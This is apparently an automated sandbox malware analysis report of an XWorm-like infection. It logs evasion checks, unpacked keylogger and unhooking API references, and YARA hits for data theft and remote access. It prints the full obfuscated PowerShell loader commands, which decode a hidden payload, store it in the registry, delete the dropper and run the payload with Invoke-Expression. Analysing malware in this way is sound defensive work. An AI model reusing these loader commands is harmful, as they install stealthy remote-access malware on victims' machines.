                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 332, type: MEMORYSTR
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6155Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3663Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5703Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4119Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep count: 5703 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep count: 4119 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: powershell.exe, 00000003.00000002.2338047448.00000243025C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -VmCIl
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 3.2.powershell.exe.24311715540.7.raw.unpack, Unhook.csReference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
                Source: 3.2.powershell.exe.24311715540.7.raw.unpack, Program.csReference to suspicious API methods: GetProcAddress(LoadLibrary(bavkmsLBGTsuCIUPxeNajklsXCgRhERjiyTqCLuQEHmaFtfZkU.RxzferoCMjMtTBCJLDoeMlkwVbyKmeWHhMnTjDUcBzzKEKnkXv("LzUlLS1vJS0t", 65)), bavkmsLBGTsuCIUPxeNajklsXCgRhERjiyTqCLuQEHmaFtfZkU.RxzferoCMjMtTBCJLDoeMlkwVbyKmeWHhMnTjDUcBzzKEKnkXv("XWxvXW59dmxPanFsfQ==", 24))
                Source: 3.2.powershell.exe.24311715540.7.raw.unpack, Program.csReference to suspicious API methods: GetProcAddress(LoadLibrary(bavkmsLBGTsuCIUPxeNajklsXCgRhERjiyTqCLuQEHmaFtfZkU.RxzferoCMjMtTBCJLDoeMlkwVbyKmeWHhMnTjDUcBzzKEKnkXv("LzUlLS1vJS0t", 65)), bavkmsLBGTsuCIUPxeNajklsXCgRhERjiyTqCLuQEHmaFtfZkU.RxzferoCMjMtTBCJLDoeMlkwVbyKmeWHhMnTjDUcBzzKEKnkXv("XWxvXW59dmxPanFsfQ==", 24))
                Source: 3.2.powershell.exe.24311a0a420.2.raw.unpack, NativeMethods.csReference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
                Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, XLogger.csReference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                Source: unknownProcess created: Base64 decoded iNVoKe-eXpReSsIon ((Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx') | Select-Object -ExpandProperty `$phantom-frZZfx)
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -c "write-host ('dedaol rotcartxe llehsrewop'[-1..-27] -join '');$path = $env:tmhryvwcxy;$path = $path.trim();try {$_1 = get-content -path $path.substring(1, $path.length - 2) -erroraction stop;} catch {$_1 = get-content -path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [convert]::('gnirts46esabmorf'[-1..-16] -join '')($_2.replace('\n', ''));$_4 = new-object byte[] $_2.length;for ($_5 = 0; $_5 -lt $_4.length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [system.text.encoding]::unicode.getstring($_4);set-itemproperty -path 'hkcu:\software\microsoft\windows search' -name '$phantom-frzzfx' -value $_4;remove-item -path $path -force;$_4 | invoke-expression"
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -ec aqboafyabwblagualqblafgacabsaguauwbzaekabwbuacaakaaoaecazqb0ac0asqb0aguabqbqahiabwbwaguacgb0ahkaiaatafaayqb0aggaiaanaegaswbdafuaogbcafmabwbmahqadwbhahiazqbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwagafmazqbhahiaywboaccaiaatae4ayqbtaguaiaanacqacaboageabgb0ag8abqatagyacgbaafoazgb4accakqagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbfahgacabhag4azabqahiabwbwaguacgb0ahkaiabgacqacaboageabgb0ag8abqatagyacgbaafoazgb4acka
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -c "write-host ('dedaol rotcartxe llehsrewop'[-1..-27] -join '');$path = $env:tmhryvwcxy;$path = $path.trim();try {$_1 = get-content -path $path.substring(1, $path.length - 2) -erroraction stop;} catch {$_1 = get-content -path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [convert]::('gnirts46esabmorf'[-1..-16] -join '')($_2.replace('\n', ''));$_4 = new-object byte[] $_2.length;for ($_5 = 0; $_5 -lt $_4.length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [system.text.encoding]::unicode.getstring($_4);set-itemproperty -path 'hkcu:\software\microsoft\windows search' -name '$phantom-frzzfx' -value $_4;remove-item -path $path -force;$_4 | invoke-expression"Jump to behavior
                Source: powershell.exe, 00000003.00000002.2338047448.00000243025A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.00000243024E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.0000024302514000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                Source: powershell.exe, 00000003.00000002.2338047448.0000024302338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.00000243025A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.00000243024E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: powershell.exe, 00000003.00000002.2338047448.0000024302338000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>1
                Source: powershell.exe, 00000003.00000002.2338047448.0000024302338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.00000243025A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.00000243024E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2=
                Source: powershell.exe, 00000003.00000002.2338047448.0000024302338000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>1
                Source: powershell.exe, 00000003.00000002.2338047448.00000243025A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.00000243024E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.0000024302514000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                Source: powershell.exe, 00000003.00000002.2338047448.00000243025A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.00000243024E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2338047448.0000024302514000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                Source: powershell.exe, 00000003.00000002.2338047448.0000024302338000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>1@
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 11.2.powershell.exe.22819b56788.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.22819b4d148.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.22819b56788.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2338047448.00000243022FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 332, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7632, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 11.2.powershell.exe.22819b56788.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.22819b4d148.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.22819b56788.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2338047448.00000243022FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 332, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7632, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
